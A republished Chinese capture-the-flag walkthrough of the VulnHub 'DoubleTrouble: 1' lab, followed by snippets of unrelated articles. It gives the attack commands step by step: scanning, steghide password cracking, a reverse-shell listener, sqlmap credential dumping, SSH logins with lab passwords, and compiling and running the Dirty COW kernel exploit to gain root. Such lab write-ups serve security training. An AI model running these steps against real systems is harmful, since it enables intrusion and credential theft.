DOUBLETROUBLE: 1

news2024/11/19 18:18:01

文章目录

      • DOUBLETROUBLE: 1实战演练
          • 一、前期准备
            • 1、相关信息
          • 二、信息收集
            • 1、nmap探测目标靶机端口
            • 2、扫描目标网址目录
            • 3、访问网站,发现secret下有个图片
            • 4、将图片下载
            • 5、查看图片所含内容
            • 6、破解密码并查看
            • 7、登陆邮箱
            • 8、创建反弹shell
            • 9、上传反弹shell
            • 10、监听
            • 11、写入交互式shell
          • 三、提权
            • 1、查看权限并提权
            • 2、查看文件
            • 3、下载镜像文件
            • 4、安装镜像
          • 四、信息收集
            • 1、nmap探测目标靶机端口
            • 2、访问网站
            • 3、利用sqlmap注入
            • 4、获取数据库
            • 5、获取表名
            • 6、获取列名
            • 7、获取字段值
            • 8、SSH远程登陆
          • 五、提权
            • 1、查看文件
            • 2、查看系统信息内核
            • 3、编译源码
            • 4、切换用户并查看文件

DOUBLETROUBLE: 1实战演练

一、前期准备
1、相关信息

靶机网站:https://www.vulnhub.com/entry/doubletrouble-1,743/

设备名称IP地址
靶机:DOUBLETROUBLE: 1192.168.0.108
攻击机:kali192.168.0.112
二、信息收集
1、nmap探测目标靶机端口
kali@kali:~$ nmap -A 192.168.0.108
# 开放SSH:22、WEB:80端口

在这里插入图片描述

2、扫描目标网址目录
kali@kali:~$ sudo dirsearch -u "http://192.168.0.108/"

在这里插入图片描述

3、访问网站,发现secret下有个图片
http://192.168.0.108/secret/

在这里插入图片描述

4、将图片下载
kali@kali:~$ http://192.168.0.108/secret/doubletrouble.jpg

在这里插入图片描述

5、查看图片所含内容
kali@kali:~$ steghide --info doubletrouble.jpg
# 发现有密码

在这里插入图片描述

6、破解密码并查看
kali@kali:~$ steghide doubletrouble.jpg rouckyou.txt -xf 密码.txt
# 邮箱:otisrush@localhost.com
# 密码:otis666

在这里插入图片描述

7、登陆邮箱

在这里插入图片描述

8、创建反弹shell

网址:https://www.revshells.com/
在这里插入图片描述

9、上传反弹shell

在这里插入图片描述

10、监听
http://192.168.0.108/uploads/users/
kali@kali:~$ nc -lvnp 9001

在这里插入图片描述

在这里插入图片描述

11、写入交互式shell
$ python -c "import pty;pty.spawn('/bin/bash')"
三、提权
1、查看权限并提权
www-data@doubletrouble:/$ sudo -l

在这里插入图片描述

2、查看文件
root@doubletrouble:~# ls
# 发现一个镜像文件

在这里插入图片描述

3、下载镜像文件
root@doubletrouble:~# python3 -m http.server
http://192.168.0.108:8000

在这里插入图片描述
在这里插入图片描述

4、安装镜像
四、信息收集
1、nmap探测目标靶机端口
kali@kali:~$ nmap -A 192.168.0.109
# 开放SSH:22、WEB:80端口

在这里插入图片描述

2、访问网站
http://192.168.0.109

在这里插入图片描述

3、利用sqlmap注入
kali@kali:~$ sqlmap -u "http://192.168.0.109/" --forms --batch

在这里插入图片描述

4、获取数据库
kali@kali:~$ sqlmap -u "http://192.168.0.109/" --forms --dbs --batch

在这里插入图片描述

5、获取表名
kali@kali:~$ sqlmap -u "http://192.168.0.109/" --forms -D doubletrouble --tables --batch

在这里插入图片描述

6、获取列名
kali@kali:~$ sqlmap -u "http://192.168.0.109/" --forms -D doubletrouble -T users --columns --batch

在这里插入图片描述

7、获取字段值
kali@kali:~$ sqlmap -u "http://192.168.0.109/" --forms -D doubletrouble -T users -C username,password --batch
# 第一个用户
# 用户名:montreux	密码:GfsZxc1
# 第二个用户
# 用户名:clapton	密码:ZubZub99

在这里插入图片描述

8、SSH远程登陆
# 利用获取的账号密码从SSH开放的端口登陆
# 第一个用户名登录
kali@kali:~$ssh montreux@192.168.0.109
# 第二个用户吗登录
kali@kali:~$ssh clapton@192.168.0.109

在这里插入图片描述

五、提权
1、查看文件
clapton@doubletrouble:~$ ls
clapton@doubletrouble:~$ cat user.txt

在这里插入图片描述

2、查看系统信息内核

源码地址:https://github.com/FireFart/dirtycow/blob/master/dirty.c

clapton@doubletrouble:~$ uname -a
# 发现内核版本为3.2.X,有Dirty Cow漏洞

在这里插入图片描述

3、编译源码
# 将源码复制到nano dirty.c中,并创建一个root密码
clapton@doubletrouble:~$ nano dirty.c
clapton@doubletrouble:~$ gcc -pthread dirty.c -o dirty -lcrypt
clapton@doubletrouble:~$./dirty root
# 部分源码,全部源码见上方源码地址
# 用户名:firefart	密码:root

在这里插入图片描述

在这里插入图片描述

4、切换用户并查看文件
clapton@doubletrouble:~$ su firefart
firefart@doubletrouble:/home/clapton# ls
firefart@doubletrouble:/home/clapton# cd
firefart@doubletrouble:~# ls
firefart@doubletrouble:~# cat root.txt

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/562400.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Jeecg-Boot 未授权SQL注入漏洞(CVE-2023-1454)

本文转载于:https://blog.csdn.net/qq_27536045/article/details/129944987 环境搭建 JDK: 1.8 (小于11) Maven: 3.5 MySql: 5.7 Redis: 3.2 Node Js: 10.0 Npm: 5.6.0 Yarn: 1.21.1 下载源码 后端源码 https://github.com/jeecgboot/jeecg-boot/tree/v…

MongoDB安装教程—Ubuntu

为啥用MongoDB,问就是客户要求。 为啥用Ubuntu,问就是客户只有Ubuntu的机器。 0. 环境 操作系统: Ubuntu 22.04.1 LTS (GNU/Linux 5.19.0-41-generic x86_64) 不同版本系统差异不同,其他版本系统未测试。 1. 安装 1.1 包管理公…

深入探索SDL游戏开发

前言 欢迎来到小K的SDL专栏第二小节,本节将为大家带来基本窗口构成、渲染器、基本图形绘制、贴图、事件处理等的详细讲解,看完后希望对你有收获 文章目录 前言一、简单窗口二、渲染器三、基本图形绘制1、点2、线3、矩形4、圆和椭圆 四、贴图五、事件处理…

XR交互技术趋势:6DoF追踪、手势识别、眼动跟踪……

XR交互技术提供了用户与虚拟环境进行交互的方式和手段,而实时云渲染则提供了真三维、可交互、高沉浸的图形渲染和计算能力。结合这两者,用户可以通过XR设备获得更真实、更沉浸的虚拟体验,同时享受到优质的图形效果和流畅的交互响应。本篇文章…

关于开发中对端口(port)的几点理解

一、服务端的端口是固定的,客户端的端口是随机的 客户端端口是随机的,比如访问百度,系统为浏览器分配了个端口1024。过一会重开电脑,访问了新浪,可能还是用1024端口,我不关浏览器,还要再开一个浏…

CenterFusion数据处理函数__getitem__()解析

CenterFusion数据处理函数__getitem__解析 1. 图像数据处理1.1 通过利用nuScence_COCO实例化对象获取图像以及相关数据的信息1.2 获取图像数据增强的相关参数:中心点c,尺度scale,旋转rotia和翻转flip1.3 根据生成的参数生成仿射矩阵来对图像进…

spring boot 集成 swagger3

Swagger 3是一种开源的API描述工具,它可以帮助开发人员设计、构建、文档化和测试API。Swagger 3支持多种编程语言和框架,包括Java、Node.js、Python、Ruby等,并提供了许多集成工具和插件,例如Postman、Apigee等。 Swagger 3使用Op…

北京君正应用案例:双镜头双画面乔安枪球联动摄像头

你是否遇到过这种问题? 既要看店铺又要看柜台 既要看车又要看大门 雷龙发展提供原厂技术支持,并提供君正集成电路完整解决方案,大大降低你的开发难度及开发时间。 单镜头摄像头一台不够广 出现监控盲区,让小偷有可趁之机 只能装两…

sql语句---left join or right join

1068. 产品销售分析 I 销售表 Sales: -------------------- | Column Name | Type | -------------------- | sale_id | int | | product_id | int | | year | int | | quantity | int | | price | int | -------------------- (s…

JS文字转语音技术实现

前言 最近在做排队叫号系统,涉及到文字转语音播报,因此总结了几种前端文字转语音发声的方法。 一、Web Speech API h5新提供的一个原生语音识别技术的API,可以将文本转成语音并播放。 作为官方的api,实现的效果是比较符合理想的…

Windows平台下用例图中包含(include)、扩展(extend)和泛化(generalization)介绍

我是荔园微风,作为一名在IT界整整25年的老兵,今天总结一下Windows平台下用例图中包含(include)、扩展(extend)和泛化(generalization)介绍。 用例图是解决用户需求的图,画好用例图一定要理清用例之间的关系。用例之间有三种关系&…

LabVIEWCompactRIO 开发指南33 测试和调试LabVIEW FPGA代码

LabVIEWCompactRIO 开发指南33 测试和调试LabVIEW FPGA代码 如前所述,应在仿真模式下开发LabVIEWFPGA VI,以快速迭代设计并避免冗长的编译时间。当需要测试和调试VI时,可以保持仿真模式或利用其他几个选项。应该根据功能验证与性能的要求以…

【LeetCode】 复制带随机指针的链表

Leetcode 138.复制带随机指针的链表 文章目录 题目描述解题思路运行代码 题目描述 给你一个长度为 n 的链表,每个节点包含一个额外增加的随机指针 random ,该指针可以指向链表中的任何节点或空节点。 构造这个链表的 深拷贝。 深拷贝应该正好由 n 个 全…

C语言中这么骚的退出程序方式你知道几个?

前言 在本篇文章当中主要给大家介绍C语言当中一些不常用的特性,比如在main函数之前和之后设置我们想要执行的函数,以及各种花式退出程序的方式。 1、main函数是最先执行和最后执行的函数吗? 1)C语言构造和析构函数 通常我们在…

Python数据分析案例27——PCA-K均值-轮廓系数客户聚类

本案例适合应用统计,数据科学,电商专业 K均值对客户进行分类的案例都做烂了......但我认为这个案例还是有一定的价值的,使用了pca,还有轮廓系数寻找最优的聚类个数。 下面来看看 代码准备 导入包 import numpy as np import pa…

网上学影视后期靠谱吗 影视后期剪辑需要学什么

影视后期如果有人手把手当面教的话,当然是最好的。但很多人都没有这么好的条件,实际上,网上也有很多教程可以学习利用。不过,小伙伴们可能会有疑问,网上学影视后期靠谱吗,影视后期剪辑需要学什么&#xff1…

从创意造型到高品质曲面的卓越体验|CATIA ICEM Design Experience

目录 IDX为设计师提供了强大直观的建模工具 IDX为曲面工程师提供高品质数字模型处理能力 IDX与其他工具配合形成完整的数字化解决方案 建模是设计工作的重要环节,合适的数字模型能够在各个环节对整个设计流程产生正面的推动作用。 设计的不同阶段对模型有各自的…

Azkaban从入门到精通以及案例实操系列

1、Azkaban概论 1.1、Azkaban简介 Azkaban 是一个开源的基于 Web 的工作流调度系统,由 LinkedIn 公司开发并维护。它可以帮助用户在大规模数据处理中来管理和调度作业,提供了简单易用、高效可靠的工作流设计和调度功能。 Azkaban 的主要特点包括&…

亿发ERP系统,全链条采购协同管理数智化平台,中小企业采购业务全流程管理

在数字时代,中小型企业在采购管理方面面临多项挑战。 集采管理难:由于资源和专业知识有限,中小企业通常难以建立集中采购职能,无法有效简化整个组织的采购活动。这一挑战包括定义采购政策、标准化程序和实施高效的采购系统。 信…

『赠书活动 | 第六期』《“Java四大名著“,你集齐了吗?》

💗wei_shuo的个人主页 💫wei_shuo的学习社区 🌐Hello World ! 『赠书活动 | 第六期』 本期书籍:《“Java四大名著”,你集齐了吗?》 赠书规则:评论区:点赞&…